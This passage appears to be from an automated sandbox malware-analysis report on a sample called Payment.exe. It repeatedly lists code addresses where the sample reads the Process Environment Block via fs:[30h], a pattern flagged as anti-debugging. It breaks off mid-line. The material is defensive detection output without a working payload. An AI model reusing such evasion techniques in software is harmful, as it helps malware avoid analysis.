Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h] 0_2_03C6F11B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h] 0_2_03C6F11B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h] 0_2_03C6F11B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h] 0_2_03C6F11B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h] 0_2_03C6F11B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h] 0_2_03C6F11B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D2010D mov eax, dword ptr fs:[00000030h] 0_2_03D2010D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D2010D mov eax, dword ptr fs:[00000030h] 0_2_03D2010D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8A93B mov eax, dword ptr fs:[00000030h] 0_2_03C8A93B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C848CB mov eax, dword ptr fs:[00000030h] 0_2_03C848CB
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C848CB mov eax, dword ptr fs:[00000030h] 0_2_03C848CB
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C848CB mov eax, dword ptr fs:[00000030h] 0_2_03C848CB
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D0F8C0 mov eax, dword ptr fs:[00000030h] 0_2_03D0F8C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C590D0 mov eax, dword ptr fs:[00000030h] 0_2_03C590D0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C590D0 mov eax, dword ptr fs:[00000030h] 0_2_03C590D0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C590D0 mov eax, dword ptr fs:[00000030h] 0_2_03C590D0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D110CF mov eax, dword ptr fs:[00000030h] 0_2_03D110CF
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C858EB mov eax, dword ptr fs:[00000030h] 0_2_03C858EB
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C858EB mov eax, dword ptr fs:[00000030h] 0_2_03C858EB
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D1B8F9 mov eax, dword ptr fs:[00000030h] 0_2_03D1B8F9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D1B8F9 mov eax, dword ptr fs:[00000030h] 0_2_03D1B8F9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7E0E8 mov eax, dword ptr fs:[00000030h] 0_2_03C7E0E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEF8F0 mov eax, dword ptr fs:[00000030h] 0_2_03CEF8F0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEF8F0 mov eax, dword ptr fs:[00000030h] 0_2_03CEF8F0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CE2893 mov eax, dword ptr fs:[00000030h] 0_2_03CE2893
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D150B3 mov eax, dword ptr fs:[00000030h] 0_2_03D150B3
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D150B3 mov eax, dword ptr fs:[00000030h] 0_2_03D150B3
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD40A7 mov eax, dword ptr fs:[00000030h] 0_2_03CD40A7
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D208A5 mov eax, dword ptr fs:[00000030h] 0_2_03D208A5
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D208A5 mov eax, dword ptr fs:[00000030h] 0_2_03D208A5
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D208A5 mov eax, dword ptr fs:[00000030h] 0_2_03D208A5
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C558BC mov eax, dword ptr fs:[00000030h] 0_2_03C558BC
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8E845 mov eax, dword ptr fs:[00000030h] 0_2_03C8E845
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C59050 mov eax, dword ptr fs:[00000030h] 0_2_03C59050
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D1A844 mov eax, dword ptr fs:[00000030h] 0_2_03D1A844
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D1A844 mov eax, dword ptr fs:[00000030h] 0_2_03D1A844
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F050 mov eax, dword ptr fs:[00000030h] 0_2_03C6F050
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F050 mov eax, dword ptr fs:[00000030h] 0_2_03C6F050
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7E067 mov eax, dword ptr fs:[00000030h] 0_2_03C7E067
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7E067 mov eax, dword ptr fs:[00000030h] 0_2_03C7E067
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEF867 mov eax, dword ptr fs:[00000030h] 0_2_03CEF867
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h] 0_2_03C7F076
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h] 0_2_03C7F076
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h] 0_2_03C7F076
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h] 0_2_03C7F076
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h] 0_2_03C7F076
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C72073 mov eax, dword ptr fs:[00000030h] 0_2_03C72073
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C82870 mov eax, dword ptr fs:[00000030h] 0_2_03C82870
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C74800 mov eax, dword ptr fs:[00000030h] 0_2_03C74800
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C74800 mov eax, dword ptr fs:[00000030h] 0_2_03C74800
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C74800 mov eax, dword ptr fs:[00000030h] 0_2_03C74800
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C74800 mov eax, dword ptr fs:[00000030h] 0_2_03C74800
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D11008 mov eax, dword ptr fs:[00000030h] 0_2_03D11008
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A01A mov eax, dword ptr fs:[00000030h]0_2_03C6A01A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A01A mov eax, dword ptr fs:[00000030h]0_2_03C6A01A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A01A mov eax, dword ptr fs:[00000030h]0_2_03C6A01A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A01A mov eax, dword ptr fs:[00000030h]0_2_03C6A01A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C57025 mov eax, dword ptr fs:[00000030h]0_2_03C57025
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C80021 mov eax, dword ptr fs:[00000030h]0_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C80021 mov eax, dword ptr fs:[00000030h]0_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C80021 mov eax, dword ptr fs:[00000030h]0_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C80021 mov eax, dword ptr fs:[00000030h]0_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D0F83F mov eax, dword ptr fs:[00000030h]0_2_03D0F83F
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C94030 mov eax, dword ptr fs:[00000030h]0_2_03C94030
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5383B mov eax, dword ptr fs:[00000030h]0_2_03C5383B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5383B mov eax, dword ptr fs:[00000030h]0_2_03C5383B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D0F7D3 mov eax, dword ptr fs:[00000030h]0_2_03D0F7D3
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov ecx, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov ecx, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C53FE5 mov eax, dword ptr fs:[00000030h]0_2_03C53FE5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C53FE5 mov eax, dword ptr fs:[00000030h]0_2_03C53FE5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C53FE5 mov eax, dword ptr fs:[00000030h]0_2_03C53FE5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D087F1 mov eax, dword ptr fs:[00000030h]0_2_03D087F1
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1F7E2 mov eax, dword ptr fs:[00000030h]0_2_03D1F7E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1F7E2 mov eax, dword ptr fs:[00000030h]0_2_03D1F7E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1F7E2 mov eax, dword ptr fs:[00000030h]0_2_03D1F7E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1F7E2 mov eax, dword ptr fs:[00000030h]0_2_03D1F7E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C847FD mov esi, dword ptr fs:[00000030h]0_2_03C847FD
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C847FD mov eax, dword ptr fs:[00000030h]0_2_03C847FD
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C847FD mov eax, dword ptr fs:[00000030h]0_2_03C847FD
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C67781 mov eax, dword ptr fs:[00000030h]0_2_03C67781
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1AF81 mov eax, dword ptr fs:[00000030h]0_2_03D1AF81
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1AF81 mov eax, dword ptr fs:[00000030h]0_2_03D1AF81
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1AF81 mov eax, dword ptr fs:[00000030h]0_2_03D1AF81
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1AF81 mov eax, dword ptr fs:[00000030h]0_2_03D1AF81
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov ecx, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov ecx, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov ecx, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov ecx, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7E79A mov eax, dword ptr fs:[00000030h]0_2_03C7E79A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7A7B6 mov eax, dword ptr fs:[00000030h]0_2_03C7A7B6
      Source: C:\Users\user\Desktop\Payment.exe